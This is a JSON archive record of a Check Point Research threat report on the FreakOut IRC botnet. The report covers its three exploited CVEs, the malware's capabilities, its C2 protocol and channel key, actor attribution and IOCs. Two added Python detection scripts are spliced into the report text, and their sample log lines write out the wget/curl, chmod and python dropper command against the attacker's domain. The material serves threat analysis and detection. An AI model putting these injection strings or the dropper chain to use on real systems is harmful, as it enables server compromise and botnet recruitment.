{
	"id": "4c3b8e75-54f2-43ce-b4af-a39dc3660b5e",
	"created_at": "2026-04-06T00:18:16.116899Z",
	"updated_at": "2026-04-10T13:11:45.563909Z",
	"deleted_at": null,
	"sha1_hash": "b7107413b20ff79f3c29635438257ec64bde7518",
	"title": "FreakOut – Leveraging Newest Vulnerabilities for creating a Botnet - Check Point Research",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 99299,
	"plain_text": "FreakOut – Leveraging Newest Vulnerabilities for creating a Botnet - Check Point Research\r\nBy Ori Hamama\r\nPublished: 2021-01-19 · Archived: 2026-04-05 17:13:21 UTC\r\nResearch By: Omer Ventura, Ori Hamama, Network Research\r\nIntroduction\r\nRecently, Check Point Research encountered several attacks that exploited multiple vulnerabilities, including some that were only recently published, to inject OS commands. The goal behind the attacks was to create an IRC botnet, which can later be used for several purposes, such as DDoS attacks or crypto-mining.\r\nThe attacks aim at devices that run one of the following:\r\n- TerraMaster TOS (TerraMaster Operating System) – the operating system used for managing TerraMaster NAS (Network Attached Storage) servers\r\n- Zend Framework – a collection of packages used in building web applications and services in PHP, with more than 570 million installations\r\n- Liferay Portal – a free, open-source enterprise portal. It is a web application platform written in Java that offers features relevant for the development of portals and websites\r\nFigure 1: The products attacked by the campaign.\r\nEach of the infected devices can later be used as an attacking platform, making the attack flow recursive. In a later variant, the XMRig miner causes the victim’s device to engage in coin-mining.\r\nFreakOut Infection Chain\r\nFigure 2: The attack flow of the campaign.\r\nThe campaign exploits three recently disclosed vulnerabilities: CVE-2020-28188, CVE-2021-3007 and CVE-2020-7961. Each gives the attacker remote code execution, which is used to download and run a Python script on the compromised servers.\r\nCVE-2020-28188\r\nThe vulnerability is caused by a lack of input validation in the “event” parameter of the “makecvs” PHP page (/include/makecvs.php). 
This allows a remote unauthenticated attacker to inject OS commands and gain control of servers running TerraMaster TOS (versions prior to 4.2.06).\r\nFigure 3: The attack exploiting CVE-2020-28188 as seen in our sensors.\r\nCVE-2021-3007\r\nThis vulnerability is caused by insecure deserialization of attacker-controlled data. In Zend Framework 3.0.0, the attacker abuses the framework’s own classes, which PHP instantiates while deserializing the object, as a gadget chain to upload and execute malicious code on the server. The code is delivered through the “callback” parameter, which in this case carries a malicious callable in place of the expected “callbackOptions” array.\r\nFigure 4: The attack exploiting CVE-2021-3007 as seen in our sensors.\r\nCVE-2020-7961\r\nhttps://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/\r\nPage 1 of 9\n\nThe vulnerability is a Java unmarshalling (deserialization) vulnerability in the JSON web services (JSONWS) API of Liferay Portal (versions prior to 7.2.1 CE GA2). Marshalling, which is similar to serialization, converts objects into a transferable form for communication with remote endpoints; here the JSONWS endpoint rebuilds Java objects from attacker-supplied JSON. Exploiting the vulnerability lets the attacker provide a malicious object that, when unmarshalled, results in remote code execution.\r\nFigure 5: The attack exploiting CVE-2020-7961 as seen in our sensors.\r\nIn all the attacks involving these CVEs, the attacker’s first move is to try different syntaxes of OS commands to download and execute a Python script named “out.py”.\r\nAfter the script is downloaded and made executable (using the “chmod” command), the attacker tries to run it using Python 2. 
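What the exploitation attempts and the follow-on dropper look like in a web server log can be checked with the following added example, written for this page and not code from Check Point or from the malware. It parses Apache combined-format lines, URL-decodes the request, flags shell metacharacters in the “event” parameter of /include/makecvs.php (CVE-2020-28188), flags POSTs to Liferay’s JSON web services API through which CVE-2020-7961 is exploited (the /api/jsonws path is Liferay’s JSONWS endpoint and is an assumption about how the request is logged; the request body, which carries the malicious object, is not in an access log), and looks for the download, chmod and python chain that fetches out.py, together with the gxbrowser[.]net domain from the IOC list. The log lines are constructed samples; the lower-case parameter name follows the page.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample lines in Apache combined log format (not taken from the page).
# Lines 1-2 mimic CVE-2020-28188 attempts carrying the out.py dropper chain, line 3 a POST
# to Liferay's JSONWS API, lines 4-5 benign traffic.
SAMPLE_LOG = """\
198.51.100.23 - - [08/Jan/2021:10:14:02 +0000] "GET /include/makecvs.php?event=%60wget%20http://gxbrowser.net/out.py%3Bchmod%20%2Bx%20out.py%3Bpython2%20out.py%60 HTTP/1.1" 200 512 "-" "python-requests/2.25.1"
198.51.100.23 - - [08/Jan/2021:10:14:03 +0000] "GET /include/makecvs.php?event=1|curl%20-O%20http://gxbrowser.net/out.py%3Bchmod%20777%20out.py%3Bpython%20out.py HTTP/1.1" 200 512 "-" "python-requests/2.25.1"
203.0.113.7 - - [08/Jan/2021:10:20:11 +0000] "POST /api/jsonws/invoke HTTP/1.1" 500 128 "-" "Mozilla/5.0"
192.0.2.5 - - [08/Jan/2021:10:21:00 +0000] "GET /include/makecvs.php?event=backup HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
192.0.2.9 - - [08/Jan/2021:10:22:00 +0000] "GET /index.php HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

RULE_TOS = "CVE-2020-28188: shell metacharacters in makecvs.php event parameter"
RULE_JSONWS = "CVE-2020-7961 surface: POST to Liferay JSONWS API (inspect request body)"
RULE_DROPPER = "FreakOut dropper chain (fetch out.py, chmod, run with python)"
RULE_IOC = "known FreakOut download/C2 domain"

IOC_DOMAINS = {"gxbrowser.net"}  # from the page's IOC list

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3})'
)
SHELL_META = re.compile(r"[;|&`]|\$\(")  # command separators and substitution
FETCH_RE = re.compile(r"\b(?:wget|curl)\b", re.I)
SCRIPT_RE = re.compile(r"\bout\.py\b", re.I)
CHMOD_RE = re.compile(r"\bchmod\b", re.I)
PY_RE = re.compile(r"\bpython[23]?(?:\.\d+)?\b", re.I)
DOMAIN_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def parse_line(line):
    """Return the fields of one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def dropper_indicators(text):
    """Indicators of the download / chmod / run chain the page describes, in URL-decoded text."""
    hits = []
    if FETCH_RE.search(text) and SCRIPT_RE.search(text):
        hits.append("fetch out.py")
    if CHMOD_RE.search(text):
        hits.append("chmod")
    if PY_RE.search(text) and SCRIPT_RE.search(text):
        hits.append("python exec")
    return hits


def analyse_request(method, target):
    """Apply the rules to one request line; returns a list of (rule, evidence)."""
    findings = []
    parts = urlsplit(target)
    path = unquote_plus(parts.path).lower()
    decoded = unquote_plus(target)
    # Rule 1: TerraMaster TOS command injection via the 'event' parameter of makecvs.php.
    if path.endswith("/include/makecvs.php"):
        for key, values in parse_qs(parts.query, keep_blank_values=True).items():
            if key.lower() != "event":
                continue
            for value in values:  # parse_qs has already percent-decoded the value
                if SHELL_META.search(value):
                    findings.append((RULE_TOS, value))
    # Rule 2: Liferay JSONWS API hit (assumed path); the payload itself is in the body.
    if method == "POST" and path.startswith("/api/jsonws"):
        findings.append((RULE_JSONWS, target))
    # Rule 3: the dropper chain shared by all three exploits.
    hits = dropper_indicators(decoded)
    if hits:
        findings.append((RULE_DROPPER, ", ".join(hits)))
    # Rule 4: a download URL pointing at a known IOC domain.
    for domain in DOMAIN_RE.findall(decoded):
        if domain.lower() in IOC_DOMAINS:
            findings.append((RULE_IOC, domain))
    return findings


def scan_access_log(text):
    """Scan a whole log; returns one dict per finding with the client IP and timestamp."""
    results = []
    for line in text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue
        for rule, evidence in analyse_request(rec["method"], rec["target"]):
            results.append({"ip": rec["ip"], "ts": rec["ts"], "rule": rule, "evidence": evidence})
    return results


if __name__ == "__main__":
    for finding in scan_access_log(SAMPLE_LOG):
        print(f"{finding['ip']:15} {finding['rule']}: {finding['evidence']}")
```

CVE-2021-3007 payloads travel in the request body as serialized PHP and are not visible in an access log either; the dropper rule is what the three exploits share, since the page notes that every attack begins with the same download-and-run command. Treat the dropper and IOC rules as high confidence and the JSONWS rule as a pointer to pull the matching request body from a proxy or WAF capture.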
Python 2 reached end-of-life (EOL) in January 2020, so the attacker is assuming the victim’s device still has this deprecated interpreter installed.\r\nThe Python Code – out.py\r\nThe malware, downloaded from the site hxxp://gxbrowser[.]net, is an obfuscated Python script consisting of polymorphic code. Many of the function names remain the same in each download, but multiple functions are obfuscated using random strings generated by a packing function. The first attack trying to download the file was observed on January 8, 2021. Since then, hundreds of download requests for the relevant URL have been made.\r\nFigure 6: The __init__ function of the main class of the code “out.py”. The code is obfuscated and encoded with several different functions. Each time it is downloaded, the code is obfuscated anew.\r\nWhen we searched for the relevant domain and file in VirusTotal (VT), we found other files named “out.py”. These files were uploaded only a few hours before the attacks began, and had low detection scores from the AV engines presented in VirusTotal. All the files originated from the same domain, hxxp://gxbrowser[.]net, as this address is hardcoded in all scripts and is the only address that appears.\r\nFigure 7: Other files related to the domain and IP. Both are Python-based although the second is classified as Java.\r\nWhen we compared the first variant uploaded to VT (the third one in Fig. 7) with our sample, function by function, it appeared to be a slightly earlier version of the code.\r\n
Figure 8: Comparing the different files. They have some similarities in function names and comments that shed some light on the more obfuscated code.\r\nThe earlier code is less obfuscated, includes comments, and appears to be related to our attacker.\r\nFigure 9: An earlier version of the same function presented in Fig. 6. This time it contained developer comments revealing some of the variables’ purposes.\r\nIn addition, in this version the attacker left a calling card with relevant information, including the code developer’s name and an update that took place on January 1, 2021. All this information was omitted in the version we studied.\r\nFigure 10: A calling card left in the earlier version of the code.\r\nComparing the two codes and their comments helped reveal the malware’s communication methods, its capabilities and the threat actor behind it.\r\nThe Malware Capabilities\r\nAt this point, the facilities and capabilities of the malware became clearer. There is a specific function for each of the main capabilities, making the code very modular and easy to change or maintain:\r\n- Port scanning utility\r\n- Collecting a system fingerprint\r\n  - Includes the device addresses (MAC, IP) and memory information. 
These are used in different functions of the code for different checks\r\n  - TerraMaster TOS version of the system\r\n- Creating and sending packets\r\n  - ARP poisoning for Man-in-the-Middle attacks\r\n  - Supports UDP and TCP packets, as well as application-layer protocols such as HTTP, DNS, SSDP and SNMP\r\n  - Protocol packing support written by the attacker\r\n- Brute force – using hard-coded credentials\r\n  - With this list, the malware tries connecting to other network devices using Telnet. The function receives an IP range and tries each IP with the given credentials. If it succeeds, the working credentials are saved to a file and sent in a message to the C2 server\r\n- Handling sockets\r\n  - Includes handling exceptions from runtime errors\r\n  - Supports multi-threaded communication with other devices, so the bot can perform actions while still listening to the server\r\n- Sniffing the network\r\n  - Executes using the “ARP poisoning” capability. The bot positions itself as a Man-in-the-Middle to other devices; the intercepted data is sent to the C2 server\r\n- Spreading to other devices, using the “exploit” function\r\n  - Randomly generates the IPs to attack\r\n  - Exploits the CVEs mentioned above (CVE-2020-7961, CVE-2020-28188, CVE-2021-3007)\r\n- Gaining persistence by adding itself to the rc.local configuration\r\n- DDoS and flooding – HTTP, DNS, SYN\r\n  - Self-implementation of Slowloris. The malware opens many sockets to the victim address to instigate a DDoS attack\r\n- Opening a reverse shell – a shell on the client\r\n- Killing a process by name or ID\r\n- Packing and unpacking the code using obfuscation techniques to give random names to the different functions and variables\r\n
Figure 11: Part of the function exploit, which is responsible for the spreading attempts. Exploits CVE-2020-7961, CVE-2020-28188 and CVE-2021-3007 (deobfuscated).\r\nThe Malware’s Communication\r\nEach infected device is configured to communicate with a hardcoded C2 server. All the connection credentials are obfuscated and encoded in the code itself multiple times, and are generated using multiple functions.\r\nAt the initial connection to the server, the conversation begins with the client sending a “NICK” message, which declares the user nickname. The nickname is generated in this format:\r\n[HAX|System OS|Machine Type|CPU count] 8-12 random letters\r\nAn example of the bot nickname as created by the script:\r\n[HAX|Linux|x86_64|3] QCRjbbnQm\r\nAfter declaring its nickname, the client sends a “USER” message consisting of the nickname, the IRC address and the string “localhost :”, followed by the bot nickname again. When the server accepts this message, the communication begins. Following a quick back-and-forth of PING/PONG messages, the server sends the client information about the channels. Then, one minute later, the client joins channels on the server.\r\nIn FreakOut, the relevant channel was “#update” on the server “gxbrowser[.]net”. The user must provide a channel key, used as a password, to join the channel. The key can be extracted from the code and is equal to the string “N3Wm3W”.\r\nFigure 12: Communication with the server. The client initiates the conversation with the relevant messages.\r\nThe client can now be used as part of a botnet campaign and accepts command messages from the server to execute. The commands are sent in a symbol-based format. 
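The registration sequence described above can be recognised on the wire. The following is an added example written for this page, not code from the malware or from Check Point: it parses client-to-server IRC lines, matches the [HAX|os|arch|cpus] nickname format, checks the USER line for the repeated nickname and the “localhost :” marker, and flags a JOIN to #update with the key N3Wm3W. The captured lines are constructed; the page does not show whether the IRC server treats the space in the nickname as a parameter separator, so the parser rejoins the NICK parameters before matching.

```python
import re

# Nickname format from the page: [HAX|System OS|Machine Type|CPU count] 8-12 random letters.
NICK_RE = re.compile(
    r"^\[HAX\|(?P<os>[^|\]]+)\|(?P<arch>[^|\]]+)\|(?P<cpus>\d+)\]\s*(?P<rand>[A-Za-z]{8,12})$"
)
# Channel and key extracted from the bot, per the page.
C2_CHANNEL = "#update"
C2_KEY = "N3Wm3W"

# Constructed client->server lines (not a real capture). The USER line follows the page's
# description: nickname, IRC address, "localhost :", nickname again.
SAMPLE_STREAM = """\
NICK [HAX|Linux|x86_64|3] QCRjbbnQm
USER QCRjbbnQm gxbrowser.net localhost :QCRjbbnQm
PONG :12345
JOIN #update N3Wm3W
PRIVMSG Freak :done
"""

# Constructed benign registration for comparison.
BENIGN_STREAM = """\
NICK alice
USER alice 0 * :Alice Example
JOIN #linux
"""


def parse_irc_line(line):
    """Split one IRC line into (COMMAND, [params], trailing) per RFC 1459 framing."""
    line = line.rstrip("\r\n")
    if not line:
        return None
    if line.startswith(":"):  # drop an optional prefix
        line = line.split(" ", 1)[1] if " " in line else ""
    trailing = None
    if " :" in line:
        line, trailing = line.split(" :", 1)
    parts = line.split(" ")
    return parts[0].upper(), parts[1:], trailing


def analyse_registration(stream):
    """Return a report of FreakOut indicators found in a client->server IRC stream."""
    report = {"nick": None, "fingerprint": None, "user_ok": False, "join": None, "indicators": []}
    for raw in stream.splitlines():
        parsed = parse_irc_line(raw)
        if not parsed:
            continue
        cmd, params, trailing = parsed
        if cmd == "NICK":
            # Rejoin params: the bot nick as shown on the page contains a space.
            nick = " ".join(params) if params else (trailing or "")
            report["nick"] = nick
            m = NICK_RE.match(nick)
            if m:
                report["fingerprint"] = {"os": m["os"], "arch": m["arch"], "cpus": int(m["cpus"])}
                report["indicators"].append("nick format [HAX|os|arch|cpus] + random letters")
        elif cmd == "USER":
            # Third parameter is the literal "localhost", real name repeats the username.
            if len(params) >= 3 and params[2] == "localhost" and trailing == params[0]:
                report["user_ok"] = True
                report["indicators"].append("USER repeats nickname with 'localhost :' marker")
        elif cmd == "JOIN":
            channel = params[0] if params else None
            key = params[1] if len(params) > 1 else None
            report["join"] = (channel, key)
            if channel == C2_CHANNEL and key == C2_KEY:
                report["indicators"].append("join to #update with hardcoded key")
    report["freakout"] = report["fingerprint"] is not None or report["join"] == (C2_CHANNEL, C2_KEY)
    return report


if __name__ == "__main__":
    for name, stream in (("sample", SAMPLE_STREAM), ("benign", BENIGN_STREAM)):
        r = analyse_registration(stream)
        print(name, "freakout" if r["freakout"] else "clean", r["indicators"])
```

The nickname alone is a strong indicator because it leaks the victim's OS, architecture and CPU count in a fixed layout; the channel key is the stronger one, since a legitimate client has no reason to know it. Feed the function the client side of a reassembled TCP stream (IRC is plain text on whatever port the bot is configured for), not the server replies.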
Each message sent by the server is parsed and split into different symbols, each with a different meaning. Every message includes the command name (e.g. udpflood, synflood), and the remaining arguments change accordingly. When the client finishes executing the command received from the C2, it sends the results in a private message (the PRIVMSG IRC command) to the relevant admin in the channel, providing the relevant details.\r\nFigure 13: Communication with the server. The server issues commands in the format described above.\r\nThe Impact\r\nBased on the malware features, it seems that the attacker can use the compromised systems for further attacks, such as using the system resources for crypto-mining, spreading laterally across the company network, or launching attacks on outside targets while masquerading as the compromised company. We revealed further information about FreakOut when we used the algorithmically generated credentials to connect to the server. After logging in, additional server information is provided to the client, including the room’s capacity, the users connected, and even operators and unknown connections.\r\nFigure 14: After logging in, more information is provided about the server.\r\nThe server was created in late November 2020 and has been running ever since, with 300 current users and 5 channels. Exploring the different channels revealed a very active one, called #update. 
This channel included 186 exploited devices communicating with the server, as seen in the messages exchanged between the IRC server and the client, and in the channel page:\r\nFigure 15: The #update channel, as seen in the IRC communication with the malware and in the IRC channel browsed through a web interface.\r\nWe observed two additional channels called “opers” (which probably stands for operators, as we have seen the server admin there) and “andpwnz”. The network name of the server is “Keknet”. Because the file was updated and released in January 2021, we believe this scale was reached in less than a week. We therefore expect this campaign to ratchet up to higher levels in the near future.\r\nThreat Actors\r\nTo identify the threat actors responsible for the attacks, we searched for leads on the internet and social media. Searching for both the code author, who goes by the name “Freak” (which we have also seen in the IRC server channels), and the IRC bot name “N3Cr0m0rPh” revealed information about the threat actor behind the campaign.\r\nIn a post published on HackForums back in 2015, submitted by the user “Fl0urite” with the title “N3Cr0m0rPh Polymorphic IRC BOT”, the bot is offered for sale in exchange for Bitcoin (BTC). This bot seems to have many of the same capabilities as the current one, and the same description as the current bot’s calling card. However, some of the features were dropped over the years, such as the USB worm and the regedit ability.\r\nFigure 16: The post submitted by “Fl0urite” back in 2015. 
The name of the IRC bot is the same, with many similar capabilities.\r\nThe name “Fl0urite” is mentioned on other hacking forums and on GitHub, and is associated with multiple pieces of code found on these sites that resemble the current malware’s functions.\r\nAs mentioned previously, “Freak@PopulusControl” appears to be the author of the latest code version. When we searched for these strings, we found several results, including an earlier version of the malware code (V6). In this version, however, the author left a comment explaining that the code is a free tool and that redistribution is allowed.\r\nFigure 17: Version 6 of the code.\r\nAs mentioned previously, the admin in the IRC channel is also called “Freak”.\r\nFigure 18: The user “Freak” joins and leaves the #update channel on the server.\r\nIn code from early 2015 found on Pastebin, uploaded by the user “Keksec”, several files link the two identities “Fl0urite” and “Freak”. In addition, these files, signed by “Freak”, contain a link to the user “Fl0urite” on HackForums. The other files uploaded by the user are signed with the exact string “Freak@PopulusControl (aka sudoer)”, which also appears to be associated with the malware functions. Based on this evidence, we conclude that both identities belong to the same person.\r\nOn Pastebin, there are also files that were uploaded recently (January 12, 2021).\r\nFigure 19-20: Files uploaded to Pastebin. The author presents himself as Freak/Fl0urite. 
The address is related to the user “Fl0urite” on HackForums, while later files uploaded are signed only with “Freak@PopulusControl”.\r\nThe URL of the site gxbrowser[.]net reveals the following page:\r\nFigure 21: The index page of gxbrowser[.]net\r\nThe page carries the names “keksec” and “Freak”, which were observed in the Pastebin files, and is also associated with the network name “Keknet” seen on the IRC server. Currently, it seems that “Freak” is using it to build a botnet.\r\nOn VT, and in the Pastebin account mentioned previously, there are other files related to the domain, such as crypto-mining malware. In the latest code downloaded (January 12, 2021), the malware tries to exploit the vulnerabilities to install XMRig from the server hxxp://gxbrowser[.]net.\r\nFigure 22: The file xmrig1 on the server gxbrowser[.]net\r\nFigure 23: Exploit function in the newest edition of the script (deobfuscated). The file “xmrig1” is also downloaded.\r\nConclusion\r\nFreakOut is an attack campaign that uses three vulnerabilities, including some newly disclosed, to compromise different servers. The threat actor behind the attack, named “Freak”, managed to infect many devices in a short period of time and incorporated them into a botnet, which in turn is used for DDoS attacks and crypto-mining. Such attack campaigns highlight the importance of taking sufficient precautions and updating your security protections on a regular basis. 
As we have observed, this is an ongoing campaign that can spread rapidly.\r\nMITRE ATT\u0026CK TECHNIQUES\r\n- Initial Access: Exploit Public-Facing Application (T1190)\r\n- Resource Development: Acquire Infrastructure: Domains (T1583.003); Compromise Infrastructure: Botnet (T1584.005)\r\n- Execution: Exploitation for Client Execution (T1203); Command and Scripting Interpreter (T1059); Command and Scripting Interpreter: Python (T1059.006); Command and Scripting Interpreter: Unix Shell (T1059.004)\r\n- Persistence: Event Triggered Execution: .bash_profile and .bashrc (T1546.004)\r\n- Privilege Escalation: Event Triggered Execution: .bash_profile and .bashrc (T1546.004)\r\n- Defense Evasion: Deobfuscate/Decode Files or Information (T1140); File and Directory Permissions Modification: Linux and Mac File and Directory Permissions Modification (T1222.002)\r\n- Credential Access: Brute Force (T1110); Man-in-the-Middle: ARP Cache Poisoning (T1557.002)\r\n- Discovery: Network Service Scanning (T1046)\r\n- Lateral Movement: Remote Services (T1021); Exploitation of Remote Services (T1210)\r\nProtections\r\nCheck Point customers are protected by these protections:\r\nIPS\r\n- TerraMaster TOS Command Injection (CVE-2020-28188)\r\n- Liferay Portal Insecure Deserialization (CVE-2020-7961)\r\n- Zend Framework Remote Code Execution (CVE-2021-3007)\r\n- CMD Injection Over HTTP\r\nAnti-Bot\r\n- Win32.IRC.G\r\n- N3Cr0m0rPh.TC.a\r\n- Win32.N3Cr0m0rPh.TC.a\r\n- Win32.N3Cr0m0rPh.TC.b\r\n- Win32.N3Cr0m0rPh.TC.c\r\n- Win32.N3Cr0m0rPh.TC.d\r\nIOCs\r\nhxxp://gxbrowser[.]net\r\n7c7273d0ac2aaba3116c3021530c1c868dc848b6fdd2aafa1deecac216131779 – out.py (less 
obfuscated)\r\n05908f2a1325c130e3a877a32dfdf1c9596d156d031d0eaa54473fe342206a65 – out.py (more obfuscated)\r\nac4f2e74a7b90b772afb920f10b789415355451c79b3ed359ccad1976c1857a8 – out.py (including the xmrig1 installation)\r\nac6818140883e0f8bf5cef9b5f965861ff64cebfe181ff025e1f0aee9c72506c – xmrig1\r\nReferences\r\nhttps://kiwiirc.com/\r\nSource: https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://research.checkpoint.com/2021/freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet/"
	],
	"report_names": [
		"freakout-leveraging-newest-vulnerabilities-for-creating-a-botnet"
	],
	"threat_actors": [
		{
			"id": "5a270f6c-2c13-4abf-861e-7d44dcfa5ceb",
			"created_at": "2023-11-03T02:00:07.794425Z",
			"updated_at": "2026-04-10T02:00:03.383096Z",
			"deleted_at": null,
			"main_name": "Keksec",
			"aliases": [],
			"source_name": "MISPGALAXY:Keksec",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434696,
	"ts_updated_at": 1775826705,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/b7107413b20ff79f3c29635438257ec64bde7518.pdf",
		"text": "https://archive.orkl.eu/b7107413b20ff79f3c29635438257ec64bde7518.txt",
		"img": "https://archive.orkl.eu/b7107413b20ff79f3c29635438257ec64bde7518.jpg"
	}
}